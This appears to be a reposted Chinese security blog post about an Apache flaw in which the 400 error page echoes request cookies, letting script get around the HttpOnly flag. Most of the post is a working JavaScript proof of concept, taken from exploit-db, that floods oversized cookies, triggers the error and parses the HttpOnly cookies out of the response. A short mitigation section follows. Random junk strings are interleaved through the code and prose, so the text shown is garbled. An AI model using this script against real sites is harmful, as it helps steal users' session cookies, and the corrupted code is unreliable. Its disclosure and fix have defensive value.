Apache HttpOnly Cookie XSS跨站漏洞

admin

很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题，一般都采用给cookie加上httponly的属性，来禁止直接使用js得到用户的cookie，从而降低xss的危害，而这个问题刚好可以用来绕过cookie的这个httponly的属性。
& Y2 e' Z" X! d6 m$ [
9 s: S, M# O$ p% Q# b! h! M用chrome打开一个站点，F12打开开发者工具，找到console输入如下代码并回车:


// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
// Construct string for cookie value
var str = "";
' k9 a& {, d5 v/ C5 C* efor (var i=0; i< 819; i++) {
! d4 C$ j5 r' x# g4 Kstr += "x";
}
2 p, P- N' P( {// Set cookies
# h1 k7 {- R+ e* P* h- _for (i = 0; i < 10; i++) {
3 i* R2 z9 t3 l& v- O: U# Y// Expire evil cookie
# W% R; |6 S! c9 c3 E6 y* ~if (good) {
& C! Z( p) S, ]; Z) I' G, @var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
' g, z6 p3 S, D  i// Set evil cookie
else {
var cookie = "xss"+i+"="+str+";path=/";
}
0 R# P2 a' y2 E6 x) l, b% Gdocument.cookie = cookie;
}
* J+ e- b" S$ E' l1 z$ Y. n* O}
function makeRequest() {
0 ^& M/ D/ G7 b8 }, ]; KsetCookies();
function parseCookies () {
8 T8 R" T8 t  Z0 y2 Z: Wvar cookie_dict = {};
( Q/ r$ V5 }8 L/ k; U// Only react on 400 status
. v" |# f* }5 b0 V" `9 vif (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
' {2 n: l; N3 f. Cif (content.length) {
// Remove Cookie: prefix
, W. l' i9 k4 \  N4 X) v; T/ t) V5 Ncontent = content[1].replace("Cookie: ", "");
% s! Y8 t0 [5 Y, d3 f* Jvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
! @1 B. L. D- @1 b0 S: p5 d// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies.split('=',2);
cookie_dict[s_c[0]] = s_c[1];
9 G7 K! ?3 a/ d6 n7 R! v}
}
! T/ t, X1 H: b% `// Unset malicious cookies
setCookies(true);
( t. N8 _0 J2 p$ s% s, Qalert(JSON.stringify(cookie_dict));
}
}
: x2 K7 J# K- y// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
, `1 N/ Z# D. u# B. K}
makeRequest();
4 n) @/ b$ B. h8 C  _8 F8 Q8 S
你就能看见华丽丽的400错误包含着cookie信息。

下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

1 x" o, g5 x5 ]) |修复方案：
2 [0 w) K7 v5 ?7 f
7 m5 \+ t% V7 X. V( ]9 _$ R+ kApache官方提供4种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下

+ Y6 R1 M5 ~' ?2 [) `In the event of a problem or error, Apachecan be configured to do one of four things,
# a& v, y' O, B1 I
1 k& @. Z' i1 R3 D8 [8 X: p1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
/ W2 Y% F" [4 e' C% ]1 I2. output acustomized message输出一段信息
# D/ A, {- ]& m, R2 T# b3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
4. redirect to an external URL to handle theproblem/error转向一个外部URL
+ z* O5 }( y/ t% a9 z$ ^4 O
经测试，对于400错误只有方法2有效，返回包不会再包含cookie内容

2 s& `0 c, e2 TApache配置：

ErrorDocument400 " security test"

3 q" v* g1 l( r$ v! E0 S+ x当然，升级apache到最新也可：）。
5 g/ z' h+ r/ T; X. m0 ~
参考：http://httpd.apache.org/security/vulnerabilities_22.html